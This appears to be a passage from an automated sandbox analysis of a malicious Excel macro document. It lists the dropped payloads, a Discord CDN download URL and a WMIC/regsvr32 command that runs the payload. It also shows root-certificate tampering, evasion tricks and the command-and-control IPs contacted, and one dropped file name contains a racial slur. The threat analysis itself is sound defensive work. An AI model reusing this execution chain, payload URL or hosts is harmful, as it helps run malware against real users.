Source: C:\Windows\System32\mshta.exe File created: C:\ProgramData\fvfnigger.bin Jump to dropped file
Drops PE files
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].bin Jump to dropped file
Source: C:\Windows\System32\mshta.exe File created: C:\ProgramData\fvfnigger.bin Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Creates and opens a fake document (probably a fake document to hide exploiting)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: cmd line: nxebchwsihyfkihhssltp.rtf Jump to behavior
Source: unknown Process created: cmd line: nxebchwsihyfkihhssltp.rtf
Stores large binary data to the registry
Source: C:\Windows\System32\mshta.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\mshta.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: OutputDebugStringW count: 1127
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2232 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1124 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2568 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2792 Thread sleep count: 1127 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\mshta.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].bin Jump to dropped file
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1127 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A70730 GetSystemInfo, 11_2_72A70730

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A66D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 11_2_72A66D0C

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Results12232021.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\Results12232021.xls, type: DROPPED
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\\ProgramData\fvfnigger.bin Jump to behavior
Source: mshta.exe, 00000005.00000002.1117819759.0000000001580000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117723049.0000000000860000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118148084.0000000000B30000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000005.00000002.1117819759.0000000001580000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117723049.0000000000860000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118148084.0000000000B30000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: mshta.exe, 00000005.00000002.1117819759.0000000001580000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.1117723049.0000000000860000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.1118148084.0000000000B30000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 11_2_72A66D0C
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A66D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 11_2_72A66D0C
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 544578 Sample: Results12232021.xls Startdate: 23/12/2021 Architecture: WINDOWS Score: 100 31 185.4.135.27 TOPHOSTGR Greece 2->31 33 85.10.248.28 HETZNER-ASDE Germany 2->33 35 2 other IPs or domains 2->35 43 Found malware configuration 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 Found malicious Excel 4.0 Macro 2->47 49 12 other signatures 2->49 7 EXCEL.EXE 56 17 2->7         started        11 regsvr32.exe 2->11         started        13 mshta.exe 4 11 2->13         started        signatures3 process4 dnsIp5 23 C:\Users\user\Desktop\Results12232021.xls, Composite 7->23 dropped 25 C:\ProgramData25xeBChwsIhYFkIhhSsLtP.rtf, HTML 7->25 dropped 51 Creates and opens a fake document (probably a fake document to hide exploiting) 7->51 16 WMIC.exe 7->16         started        19 regsvr32.exe 11->19         started        37 cdn.discordapp.com 162.159.135.233, 443, 49165 CLOUDFLARENETUS United States 13->37 27 C:\...\WIvRRHIemuhammadismyfriend[1].bin, PE32 13->27 dropped 29 C:\ProgramData\fvfnigger.bin, PE32 13->29 dropped 21 WMIC.exe 13->21         started        file6 signatures7 process8 signatures9 39 Creates processes via WMI 16->39 41 Tries to delay execution (extensive OutputDebugStringW loop) 19->41
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.4.135.27
 unknown Greece
199246 TOPHOSTGR true
162.159.135.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
85.10.248.28
 unknown Germany
24940 HETZNER-ASDE true
80.211.3.13
 unknown Italy
31034 ARUBA-ASNIT true
144.91.122.102
 unknown Germany
51167 CONTABODE true

Contacted Domains

Name IP Active
cdn.discordapp.com 162.159.135.233 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://cdn.discordapp.com/attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfriend.bin false
    		high